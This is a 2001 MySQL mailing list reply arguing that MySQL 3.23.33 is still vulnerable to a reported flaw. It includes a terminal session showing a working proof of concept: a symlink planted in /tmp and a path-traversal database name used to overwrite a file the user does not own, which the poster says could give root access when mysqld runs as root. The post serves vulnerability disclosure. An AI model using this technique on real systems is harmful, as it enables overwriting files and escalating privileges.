Re: FW: potential vulnerability of mysqld running with root privileges

Wed, 21 Mar 2001 01:38:58 -0800 

Hi.

On Tue, Mar 20, 2001 at 12:22:19PM +0100, [EMAIL PROTECTED] wrote:
> Hi!
> 
> On Mar 20, Basil Hussain wrote:
> > Hi all,
> > 
> > The original message below was posted to the BugTraq mailing list. Have the
> > developers seen this? I know it talks about version mysql-3.20.32a (which is
> > ancient), but he mentions that it affects other versions.
> > 
> > Anyway, I don't run my MySQL server as root, so I'm not worried. :)
> > 
> 
> You shouldn't.
> 
> MySQL-3.23 is not vulnerable.

How did you determine that?


Sorry to contradict, but have a look:

newton:~> mysql -u root -e "select version()"
+-----------+
| version() |
+-----------+
| 3.23.33   |
+-----------+
8:26:25 newton:~> sudo -u mysql touch /tmp/test # just created a file owned by 
mysql-user
8:26:45 newton:~> ln -sf /tmp/test /tmp/yikes.MYI
8:26:54 newton:~> ls -l /tmp
[...]
-rw-r--r--    1 mysql    mysql           0 Mar 21 08:26 test
lrwxrwxrwx    1 philemon philemon        9 Mar 21 08:28 yikes.MYI -> /tmp/test
8:26:57 newton:~> mysql ../../../../tmp -e "create table yikes(w int(4))"
8:27:02 newton:~> ls -l /tmp
[...]
-rw-r--r--    1 mysql    mysql        1024 Mar 21 08:28 test
-rw-rw----    1 mysql    mysql           0 Mar 21 08:28 yikes.MYD
lrwxrwxrwx    1 philemon philemon        9 Mar 21 08:28 yikes.MYI -> /tmp/test
-rw-rw----    1 mysql    mysql        8548 Mar 21 08:28 yikes.frm

So, I have just overwritten a file not owned by me, namely /tmp/test.
If mysql was running as root (which is of couse deprecated), I could
overwrite any file in the system this way and even gain root access
(as shown by someone on bugtraq), I think.

Did I overlook something?

So, it looks to me, that at least 3.23.33 is not secure in this way (I
have not compared 3.23.34 resp. 3.23.35 because for both problems were
reported preventing them from use in production systems).

Even without MySQL running as root, I can do a lot of harm (with
privilege to create tables, I can probably gain MySQL root privileges,
delete any other table, delete configs and log files and so on).

Bye,

        Benjamin.


---------------------------------------------------------------------
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/           (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Reply via email to